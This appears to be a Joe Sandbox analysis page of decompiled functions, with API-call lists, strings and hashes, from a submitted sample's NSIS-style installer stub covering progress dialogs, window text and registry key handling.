Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
Instruction ID: 9ca9f948efa3d3b3c01768b84b42719a88da944e93008125b7d5b0dd1b363230
Opcode Fuzzy Hash: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
Instruction Fuzzy Hash: 5B318D71C00128BBDF216FA9CD89D9E7E79EF09364F10422AF910772E0D7795D419BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404E23, Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E23(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423684;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423f54;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405AA7(0, _t39, 0x41fc70, 0x41fc70, _a4);
					}
					_t26 = lstrlenA(0x41fc70);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423668, 0x41fc70);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fc70;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fc70)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fc70, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x00404e29
0x00404e35
0x00404e38
0x00404e3e
0x00404e4a
0x00404e4d
0x00404e50
0x00404e56
0x00404e56
0x00404e5c
0x00404e64
0x00404e67
0x00404e84
0x00404e88
0x00404e91
0x00404e91
0x00404e9b
0x00404ea4
0x00404eb0
0x00404eb7
0x00404ebb
0x00404ebe
0x00404ed1
0x00404edf
0x00404edf
0x00404ee3
0x00404ee5
0x00404ee8
0x00000000
0x00404ee8
0x00404e69
0x00404e71
0x00404e79
0x00404e7f
0x00000000
0x00404e7f
0x00404e79
0x00404e67
0x00404ef2

APIs

lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
Instruction ID: 451019a1d205659c79ebfdec41688bb46c1145c2f0803241f2332644a3b6c24c
Opcode Fuzzy Hash: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
Instruction Fuzzy Hash: 12217C71A00118BBCB119FA5DD809DFBFB9FB44354F00807AF904A6290C7394E45CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004046F2, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004046F2(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404700
0x0040470d
0x00404713
0x00404751
0x00404751
0x00404760
0x00404767
0x00000000
0x00404769
0x00404715
0x00404724
0x0040472c
0x0040472f
0x00404741
0x00404747
0x0040474e
0x00000000
0x0040474e
0x00000000

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040470D
GetMessagePos.USER32 ref: 00404715
ScreenToClient.USER32 ref: 0040472F
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404741
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404767

Strings

f, xrefs: 00404743

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction ID: 77fe7446b7d437ffed3a300e181f1a5f8136abba45dafe536ab26234a61f9ca7
Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction Fuzzy Hash: 74014071D00219BADB01DBA4DD45BFEBBB8AB55711F10012ABA10B71C0D7B4A5018B95

Uniqueness

Uniqueness Score: -1.00%

Function 00402B2D, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BA9();
					_t19 = "unpacking data: %d%%";
					if( *0x423eb0 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402b3a
0x00402b48
0x00402b4e
0x00402b4e
0x00402b5c
0x00402b5e
0x00402b6a
0x00402b6f
0x00402b71
0x00402b71
0x00402b7c
0x00402b8c
0x00402b9e
0x00402b9e
0x00402ba6

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B48
wsprintfA.USER32 ref: 00402B7C
SetWindowTextA.USER32(?,?), ref: 00402B8C
SetDlgItemTextA.USER32 ref: 00402B9E

Strings

unpacking data: %d%%, xrefs: 00402B6A, 00402B7A
verifying installer: %d%%, xrefs: 00402B71

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
Instruction ID: 63589245c82b20a35a818b51aea08eb627593e3ecb5db54badb7bc3d6c1792f2
Opcode Fuzzy Hash: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
Instruction Fuzzy Hash: F3F01D70900209ABEF215F50DD0ABAA3779BB04345F00803AFA06A91D1D7B9AA569B99

Uniqueness

Uniqueness Score: -1.00%

Function 004022F5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004022F5(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402ADD(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029E8(2);
				_t18 = E004029E8(0x11);
				_t31 =  *0x423f50 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x423f50 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029E8(0x23);
						_t19 = lstrlenA(0x40a368) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029CB(3);
						 *0x40a368 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F01(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a368, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a368, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
				return 0;
			}

0x004022f6
0x004022fb
0x00402305
0x0040230f
0x00402312
0x00402322
0x0040232c
0x00402333
0x0040233b
0x00402349
0x0040234d
0x00402358
0x00402358
0x0040235c
0x00402360
0x00402366
0x0040236b
0x0040236b
0x0040236f
0x0040237b
0x0040237b
0x00402394
0x00402396
0x00402396
0x00402399
0x0040246f
0x0040246f
0x00402880
0x0040288c

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402333
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsvCA57.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402353
RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsvCA57.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238C
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsvCA57.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040246F

Strings

C:\Users\user\AppData\Local\Temp\nsvCA57.tmp, xrefs: 00402344, 00402366, 00402376, 00402381

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsvCA57.tmp
API String ID: 1356686001-3644277994
Opcode ID: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
Instruction ID: c0f72d529a206c1f33eb9b8d59e365bb4fe54d10a3d93e78d78dba992e985e14
Opcode Fuzzy Hash: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
Instruction Fuzzy Hash: 0F1175B1E00118BFEB10AFA1DE4AEAF767CEB04758F10443AF505B71D0D6B99D019A69

Uniqueness

Uniqueness Score: -1.00%

Function 00402BC5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402BC5(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t14;

				if(_a4 != 0) {
					_t14 =  *0x417044; // 0x0
					if(_t14 != 0) {
						_t14 = DestroyWindow(_t14);
					}
					 *0x417044 = 0;
					return _t14;
				}
				__eflags =  *0x417044; // 0x0
				if(__eflags != 0) {
					return E00405DDC(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423eac;
				if(_t6 >  *0x423eac) {
					__eflags =  *0x423ea8;
					if( *0x423ea8 == 0) {
						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B2D, 0);
						 *0x417044 = _t7;
						return _t7;
					}
					__eflags =  *0x423f54 & 0x00000001;
					if(( *0x423f54 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BA9());
						return E00404E23(0,  &_v68);
					}
				}
				return _t6;
			}

0x00402bd1
0x00402bd3
0x00402bda
0x00402bdd
0x00402bdd
0x00402be3
0x00000000
0x00402be3
0x00402beb
0x00402bf1
0x00000000
0x00402bf4
0x00402bfb
0x00402c01
0x00402c07
0x00402c09
0x00402c0f
0x00402c4d
0x00402c53
0x00000000
0x00402c53
0x00402c11
0x00402c18
0x00402c29
0x00000000
0x00402c37
0x00402c18
0x00402c5a

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402BDD
GetTickCount.KERNEL32 ref: 00402BFB
CreateDialogParamA.USER32(0000006F,00000000,00402B2D,00000000), ref: 00402C4D

Part of subcall function 00402BA9: MulDiv.KERNEL32(000429B0,00000064,00044902), ref: 00402BBE

wsprintfA.USER32 ref: 00402C29

Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF

Strings

... %d%%, xrefs: 00402C23

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: MessageSend$Windowlstrlen$CountCreateDestroyDialogParamTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 632923820-2449383134
Opcode ID: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
Instruction ID: 259a824e759da58d6bdbd9050b41674a690fb301749dacda7e517d53f8420425
Opcode Fuzzy Hash: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
Instruction Fuzzy Hash: 29019270909224EBDB216F60EF4C99F7B78AB047017104137F801B12D1C6BCA986C6EE

Uniqueness

Uniqueness Score: -1.00%

Function 00402A28, Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402A28(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423f50 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A28(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405DA3(2);
					if(_t27 == 0) {
						if( *0x423f50 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423f50, 0);
				}
				return _t18;
			}

0x00402a49
0x00402a51
0x00402a79
0x00402a63
0x00402ab3
0x00402ab9
0x00000000
0x00402abb
0x00402a77
0x00000000
0x00000000
0x00402a77
0x00402a8e
0x00402a96
0x00402a9d
0x00402ac9
0x00000000
0x00000000
0x00402ad1
0x00402ad9
0x00000000
0x00000000
0x00000000
0x00402ad9
0x00000000
0x00402aac
0x00402ac0

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A49
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
RegCloseKey.ADVAPI32(?), ref: 00402A8E
RegCloseKey.ADVAPI32(?), ref: 00402AB3
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
Instruction ID: 7ac3799e0b9b7f286de12d9a89f233b53136cfd59643404f79253a10a0ceffad
Opcode Fuzzy Hash: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
Instruction Fuzzy Hash: AA115931A00009FEDF21AF90DE48DAB3B79EB44395B104536BA05A01A0DB749E51AE69

Uniqueness

Uniqueness Score: -1.00%

Function 00401CC1, Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401ccb
0x00401cd2
0x00401d01
0x00401d09
0x00401d10
0x00401d10
0x00402880
0x0040288c

APIs

GetDlgItem.USER32 ref: 00401CC5
GetClientRect.USER32 ref: 00401CD2
LoadImageA.USER32 ref: 00401CF3
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
DeleteObject.GDI32(00000000), ref: 00401D10

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
Instruction ID: ad5020e38ef11d08f371025551c7f23f007b957d45941c5b52acf933ea75ddf9
Opcode Fuzzy Hash: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
Instruction Fuzzy Hash: 31F0F9B2A04105BFD700EBA4EE89DAFB7BDEB44341B104476F601F21A0C7789D018B29

Uniqueness

Uniqueness Score: -1.00%

Function 00404610, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00404610(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405AA7(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405AA7(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405AA7(_t34, 0, 0x420498, 0x420498, _a8);
				wsprintfA(_t26 + lstrlenA(0x420498), "%u.%u%s%s");
				return SetDlgItemTextA( *0x423678, _a4, 0x420498);
			}

0x00404618
0x0040461c
0x00404624
0x00404627
0x00404628
0x0040462a
0x0040462c
0x0040462f
0x0040462f
0x00404636
0x0040463c
0x0040463c
0x00404643
0x0040464e
0x0040464f
0x00404652
0x00404652
0x0040465f
0x0040466a
0x0040466d
0x0040467f
0x00404686
0x00404687
0x00404696
0x004046a6
0x004046c2

APIs

lstrlenA.KERNEL32(00420498,00420498,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404530,000000DF,0000040F,00000400,00000000), ref: 0040469E
wsprintfA.USER32 ref: 004046A6
SetDlgItemTextA.USER32 ref: 004046B9

Strings

%u.%u%s%s, xrefs: 00404688

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
Instruction ID: 4c66ffa9968b47036da968d2f23bae361eeba693da1d293f62fa9500f86314f5
Opcode Fuzzy Hash: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
Instruction Fuzzy Hash: 6211E6737001243BDB10A5699C45EAF3299DBC2335F14423BF625F61D1E9798C1186A9

Uniqueness

Uniqueness Score: -1.00%

Function 00401BAD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029CB(3);
				 *(_t55 + 8) = E004029CB(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029E8(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029E8();
					_t28 = E004029E8();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029CB();
					_t37 = E004029CB();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E004059E3();
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}

0x00401bb6
0x00401bc2
0x00401bc5
0x00401bce
0x00401bce
0x00401bd1
0x00401bd5
0x00401bde
0x00401bde
0x00401be1
0x00401be5
0x00401be7
0x00401c34
0x00401c36
0x00401c3f
0x00401c47
0x00401c4a
0x00401c4a
0x00401c53
0x00000000
0x00401be9
0x00401bf0
0x00401bf2
0x00401bfa
0x00401bfd
0x00401c25
0x00401c59
0x00401c59
0x00401bff
0x00401c0d
0x00401c15
0x00401c18
0x00401c18
0x00401bfd
0x00401c5c
0x00401c5f
0x00401c65
0x00402825
0x00402825
0x00402880
0x0040288c

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
